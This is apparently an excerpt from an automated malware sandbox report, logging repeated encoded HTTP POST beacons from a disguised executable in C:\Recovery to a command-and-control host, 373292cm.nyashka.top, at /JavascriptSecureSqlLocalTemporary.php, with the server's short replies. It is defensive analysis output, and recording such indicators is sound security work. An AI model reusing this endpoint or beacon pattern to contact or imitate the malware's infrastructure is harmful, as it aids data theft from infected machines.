                                    Data Ascii: <12:#&(")+/29*,3:]"325?%'\$1*9965^?UX22=7# 6!7'7"'Z,3.[".0W9201]X0&_8_)-\<]3(41UX<+,/V 'U3A)%?<-+6>Q"=6:9P:=YX/ 1+Y;=%';+-Z Y'-*8 5-%,+6Y\<%%(.+_%T("+9-,47TX'R<^.1
                                    Aug 25, 2024 15:43:38.445686102 CEST2472OUTData Raw: 3d 00 53 25 2e 21 06 5f 3c 2c 39 07 39 29 07 3f 0a 2d 2b 26 00 3f 5f 5a 0c 20 3d 5d 3c 05 2a 38 23 33 2b 07 25 5f 16 11 07 03 52 3e 2c 38 2a 22 34 55 35 15 09 2a 24 1d 09 5b 2b 56 35 3c 26 23 3d 58 1e 2e 21 29 0e 05 3a 58 2d 3d 3f 0b 31 0c 3e 28
                                    Data Ascii: =S%.!_<,99)?-+&?_Z =]<*8#3+%_R>,8*"4U5*$[+V5<&#=X.!):X-=?1>(3%;1I<'V>=+-=:=:?'((+:Q%0?_":"<Z.)<Z^52-YV(&<@6?2Z>/''?+ ?74##2*$!7U=4_>(4/56Y42>U(983'289#2=/1:?T=/1U*[XX-09
                                    Aug 25, 2024 15:43:38.445705891 CEST2472OUTData Raw: 35 3f 0a 00 09 59 30 0e 37 3d 05 34 07 00 1e 5f 39 09 35 1e 2e 29 21 00 2b 07 15 58 03 00 5e 18 03 32 08 14 3c 54 20 36 3d 07 52 5d 01 09 50 3f 21 0a 39 0d 29 34 00 5a 3b 38 5c 53 33 56 03 34 33 04 34 27 00 3e 51 3e 08 3a 08 58 0a 07 5c 55 3e 28
                                    Data Ascii: 5?Y07=4_95.)!+X^2<T 6=R]P?!9)4Z;8\S3V434'>Q>:X\U>(-%+>[6 ??&81!.?="095]%P/,"^,&?:56;);-6^$T<++()?$!8$$:.^3:Z)$/1>3"812%U3%'R2/9\)Y/]7&)!Q(Z48?!T<*=038+%T-#4/( 9;
                                    Aug 25, 2024 15:43:38.744330883 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:39.500750065 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.64973180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:38.103984118 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:38.451109886 CEST2512OUTData Raw: 5f 51 59 57 54 45 54 5e 5b 5f 5a 51 59 57 58 53 57 5e 5d 5e 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _QYWTET^[_ZQYWXSW^]^W_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\;$68Y" Y)=(^>-)\<-?4 2;<947 ",>&F$.Y/5
                                    Aug 25, 2024 15:43:38.829404116 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:38.966350079 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.64973280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:39.292814970 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:39.644577026 CEST2516OUTData Raw: 5f 53 5c 51 51 42 54 5d 5b 5f 5a 51 59 5f 58 57 57 5d 5d 59 57 5a 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\QQBT][_ZQY_XWW]]YWZSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.8'"7"0:+.<_<)?>? ??R#8V+3_42,.&F$.Y/
                                    Aug 25, 2024 15:43:39.772814035 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:39.934329987 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.64973380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:40.066864014 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:40.424029112 CEST2516OUTData Raw: 5a 50 5c 52 54 48 54 5b 5b 5f 5a 51 59 55 58 55 57 5a 5d 5d 57 5d 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZP\RTHT[[_ZQYUXUWZ]]W]S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,3!; 9\)=#>-5[?4Z7S4(_7\7#=X,&F$.Y/-
                                    Aug 25, 2024 15:43:40.737401009 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:40.867577076 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.64973480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:41.003880978 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:41.357326984 CEST2516OUTData Raw: 5a 55 59 52 51 40 51 5d 5b 5f 5a 51 59 54 58 5f 57 5b 5d 5a 57 50 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZUYRQ@Q][_ZQYTX_W[]ZWPSU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._8,5<_# Y=[ \<>)+>$7<(#10?*##3!];.&F$.Y/)
                                    Aug 25, 2024 15:43:41.674597979 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:41.801875114 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.64973580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:42.292937994 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:42.638895035 CEST2516OUTData Raw: 5a 51 5c 54 54 44 51 59 5b 5f 5a 51 59 54 58 50 57 5d 5d 58 57 58 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\TTDQY[_ZQYTXPW]]XWXSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y,U$"=(\41X>-$\?X&?'7/R ",(#_#1;.&F$.Y/)
                                    Aug 25, 2024 15:43:43.193212986 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:43.194067955 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.64973680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:43.194902897 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1828
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:43.547055960 CEST1828OUTData Raw: 5f 5c 59 55 51 47 51 5e 5b 5f 5a 51 59 57 58 56 57 59 5d 5d 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YUQGQ^[_ZQYWXVWY]]W_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.8+6$_70!=++._<-'[#,70P?7]4058&F$.Y/!
                                    Aug 25, 2024 15:43:44.014338017 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:44.072012901 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 29 35 26 59 25 28 38 50 30 23 21 0c 2a 2d 09 5b 2b 2d 04 06 25 38 25 59 32 07 38 57 30 3b 36 02 3f 10 29 08 31 01 24 01 2d 34 2b 5d 0c 13 22 14 34 3a 21 04 26 2c 2b 04 3d 16 37 5c 21 2f 25 00 29 3a 29 54 2b 3f 02 5a 28 07 05 10 3f 39 22 54 2c 28 0f 5c 3a 0e 25 08 20 2e 2b 52 0d 11 24 52 2b 3d 03 55 29 3e 38 06 22 3b 3f 12 26 2e 2e 56 26 1c 29 0f 24 29 01 05 27 21 39 50 25 22 35 1c 24 3b 36 5a 27 3f 36 09 22 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W)5&Y%(8P0#!*-[+-%8%Y28W0;6?)1$-4+]"4:!&,+=7\!/%):)T+?Z(?9"T,(\:% .+R$R+=U)>8";?&..V&)$)'!9P%"5$;6Z'?6"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.64973780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:43.239518881 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:43.610989094 CEST2516OUTData Raw: 5f 55 59 57 54 44 54 58 5b 5f 5a 51 59 56 58 54 57 5d 5d 52 57 5e 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _UYWTDTX[_ZQYVXTW]]RW^S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^8<#-;# 5\)'>.9_([ ,<4!P**$ 5_,&F$.Y/!
                                    Aug 25, 2024 15:43:44.014584064 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:44.106225967 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.64973880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:44.238580942 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:44.742530107 CEST2516OUTData Raw: 5f 5c 5c 54 54 40 54 5a 5b 5f 5a 51 59 50 58 56 57 51 5d 52 57 58 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\\TT@TZ[_ZQYPXVWQ]RWXS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./38!.4Y #%]+-#+)+#4?#'(:?\#6..&F$.Y/
                                    Aug 25, 2024 15:43:44.912566900 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:45.042135954 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.64973980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:45.178832054 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:45.529180050 CEST2516OUTData Raw: 5a 55 5c 57 54 46 51 5a 5b 5f 5a 51 59 51 58 57 57 50 5d 53 57 5c 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZU\WTFQZ[_ZQYQXWWP]SW\S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y8/A#=8X V"><=!_+>8#Z?P#V<7,&F$.Y/=
                                    Aug 25, 2024 15:43:45.844005108 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:45.973835945 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.64974080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:46.096366882 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:46.451878071 CEST2516OUTData Raw: 5f 54 5c 50 51 45 54 5c 5b 5f 5a 51 59 5f 58 51 57 5e 5d 53 57 5c 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _T\PQET\[_ZQY_XQW^]SW\S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./#-8#0X*=+<=4 $!2<<<7/>&F$.Y/
                                    Aug 25, 2024 15:43:46.802618027 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:47.001422882 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.64974280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:47.160403013 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:47.514535904 CEST2516OUTData Raw: 5a 57 59 54 51 47 54 5e 5b 5f 5a 51 59 50 58 51 57 50 5d 5a 57 50 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZWYTQGT^[_ZQYPXQWP]ZWPS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.],+C#=$^ Z*=\+.\+>;4Z3V!1$P+:?^4V*;.&F$.Y/
                                    Aug 25, 2024 15:43:47.833786964 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:47.958163023 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.64974380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:48.106570959 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:48.451092958 CEST2516OUTData Raw: 5f 51 5c 54 51 40 51 5b 5b 5f 5a 51 59 5f 58 57 57 51 5d 5a 57 5f 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _Q\TQ@Q[[_ZQY_XWWQ]ZW_S_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/'B5 ]>=(5Z?>$##Q7R**;\ V&/>&F$.Y/
                                    Aug 25, 2024 15:43:48.775976896 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:48.906919956 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.64974480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:49.031591892 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.64974580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:49.247071981 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:49.592120886 CEST1840OUTData Raw: 5f 54 5c 52 51 47 54 5d 5b 5f 5a 51 59 5e 58 56 57 50 5d 5b 57 51 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _T\RQGT][_ZQY^XVWP][WQSZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;0/@5>( 3=X==^+.(#,#W4/<_+^7=]8&F$.Y/
                                    Aug 25, 2024 15:43:49.960719109 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:50.090001106 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
